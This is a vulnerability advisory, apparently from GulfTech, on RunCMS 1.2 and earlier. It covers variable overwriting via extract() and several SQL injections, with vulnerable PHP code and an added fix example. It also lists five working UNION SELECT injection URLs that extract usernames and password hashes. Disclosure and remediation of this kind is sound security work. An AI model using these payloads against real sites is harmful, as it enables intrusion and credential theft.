RunCMS Multiple Vulnerabilities
Vendor: RunCMS
Product: RunCMS
Version: <= 1.2
Website: http://www.runcms.org/
BID: 14631 14634
CVE: CVE-2005-2691 CVE-2005-2692
OSVDB: 18907 18908 18909 18910 18911 18912
SECUNIA: 16514
Description:
RunCMS is a very popular, full featured content management system based on the XOOPS content management system. There are a number of fairly serious vulnerabilities in RunCMS that may allow an attacker to overwrite very important variables used by RunCMS and to conduct SQL Injection attacks. A new version of RunCMS was released some time ago, and all users are advised to upgrade immediately.


Arbitrary Variable Overwriting:
It is possible for an attacker to overwrite arbitrary variables by passing the variables via the POST method. Let's have a look at the vulnerable code in the /includes/common.php script.


// ################# :: Register Globals Compatibility :: #################
$globals_test = @ini_get('register_globals');
if ( isset($globals_test) && empty($globals_test) ) {
	// These still need some work :: Cookie|Server|Env are ok now.
	if ( !empty($HTTP_GET_VARS) )  { extract($HTTP_GET_VARS, EXTR_SKIP);  }
	if ( !empty($HTTP_POST_VARS) ) { extract($HTTP_POST_VARS, EXTR_OVERWRITE); }
	define('_GLOBALS', FALSE);
} else {
	define('_GLOBALS', TRUE);
}


In the default PHP settings register_globals is off, and when that is the case all of the POST variables are extracted into the global scope and any existing variables of the same name are overwritten. This is especially dangerous because it makes overwriting variables such as the $xoopsConfig array possible. The remedy for this would be to use EXTR_SKIP in place of the EXTR_OVERWRITE argument, as is already done for the GET variables on the line above.


SQL Injection:
There are a number of highly exploitable SQL Injection issues in RunCMS that can be exploited to obtain an administrator's password hash and other sensitive information from the underlying database. First we will concentrate on the newbb plus module, and its search engine in particular.

if ( isset($term) && $term != "" ) {

	$terms = split(" ", addslashes($term));
	$addquery .= "(p.post_text LIKE '%$terms[0]%'";
	$subquery .= "(t.topic_title LIKE '%$terms[0]%'";
	if ( $addterms == "any" ) {
		$andor = "OR";
	} else {
		$andor = "AND";
	}
	$size = count($terms);
	for ($i=1; $i<$size; $i++) {
		$addquery.=" $andor p.post_text LIKE '%$terms[$i]%'";
		$subquery.=" $andor t.topic_title LIKE '%$terms[$i]%'";
	}
	$addquery.=")";
	$subquery.=")";
}

When submitting a search, the $addquery and $subquery variables can be prefixed with malicious query data because they are never initialized before being appended to; whatever value a request supplies under those names becomes the start of the SQL. This works regardless of the register_globals setting because of the previously mentioned code in /includes/common.php that extracts all GET/POST variables into global variables. In addition to these SQL Injection issues there are several other, equally dangerous SQL Injection issues in both newbb plus and the messages module included in the core RunCMS package.

http://runcms/modules/newbb_plus/newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/*

http://runcms/modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20runcms_users%20WHERE%201/*&post_id=2'&topic_id=2&viewmode=flat&order=0

http://runcms/modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/*&post_id=2&topic_id=2&viewmode=flat&order=0

http://runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_pn

http://runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_sent_pn

The above examples work with the default PHP settings of register_globals off and magic_quotes_gpc off. Of course, for the above examples to apply to a given installation the correct path to RunCMS must be specified, as well as the correct database table prefix, assuming that one even exists.
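The two fixes the advisory points at, the EXTR_SKIP change in /includes/common.php and the missing initialization of $addquery/$subquery in the newbb plus search, are shown below as an added example; this is not RunCMS code, and the function names importRequestVars and buildSearchClauses, along with the constructed $existing and $post arrays that stand in for the already-defined globals and $HTTP_POST_VARS, are assumptions made for the illustration.

```php
<?php
// Added example, not RunCMS code. Models the register_globals shim and the
// search clause builder as functions so the effect of each fix is visible.

// $existing stands in for variables common.php has already defined
// (e.g. $xoopsConfig); $post stands in for $HTTP_POST_VARS.
// Returns the variable table that results from running extract() with $mode.
function importRequestVars(array $existing, array $post, $mode)
{
    // extract() works on the local scope, so seed it with the "real" values.
    extract($existing, EXTR_OVERWRITE);
    // EXTR_OVERWRITE (the vulnerable choice) lets a POSTed 'xoopsConfig'
    // replace the real one; EXTR_SKIP keeps the already-defined value.
    extract($post, $mode);
    $vars = get_defined_vars();
    unset($vars['existing'], $vars['post'], $vars['mode']);
    return $vars;
}

// The newbb_plus search logic with $addquery and $subquery initialised
// before use, so a request variable of the same name can no longer be
// prefixed to the SQL. Escaping is kept as in the original (addslashes);
// explode() replaces split(), which no longer exists in PHP 7+.
function buildSearchClauses($term, $addterms)
{
    $addquery = '';   // the missing initialisation
    $subquery = '';
    if (!isset($term) || $term === '') {
        return array($addquery, $subquery);
    }
    $terms = explode(' ', addslashes($term));
    $andor = ($addterms === 'any') ? 'OR' : 'AND';
    $addquery .= "(p.post_text LIKE '%{$terms[0]}%'";
    $subquery .= "(t.topic_title LIKE '%{$terms[0]}%'";
    for ($i = 1, $n = count($terms); $i < $n; $i++) {
        $addquery .= " $andor p.post_text LIKE '%{$terms[$i]}%'";
        $subquery .= " $andor t.topic_title LIKE '%{$terms[$i]}%'";
    }
    return array($addquery . ')', $subquery . ')');
}

// Constructed request: a POST body carrying a variable named xoopsConfig.
$existing = array('xoopsConfig' => array('language' => 'english'));
$post     = array('xoopsConfig' => array('language' => 'tampered'), 'term' => 'foo bar');

$vuln = importRequestVars($existing, $post, EXTR_OVERWRITE);
$safe = importRequestVars($existing, $post, EXTR_SKIP);
echo "EXTR_OVERWRITE: ", $vuln['xoopsConfig']['language'], "\n";
echo "EXTR_SKIP:      ", $safe['xoopsConfig']['language'], "\n";

list($add, $sub) = buildSearchClauses($post['term'], 'any');
echo $add, "\n", $sub, "\n";
```

The clause builder still interpolates user input into LIKE patterns; a parameterized query is the complete fix, but the initialisation alone closes the prefix injection the advisory describes.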


Solution:
These issues were somewhat silently patched in mid July. I have just now found out about the patch release after talking to the lead developer, and as far as I can tell there was never an announcement made letting users know why they should upgrade. One good thing is that RunCMS now has a security@runcms.org email address.


Credits:
James Bercegay of the GulfTech Security Research Team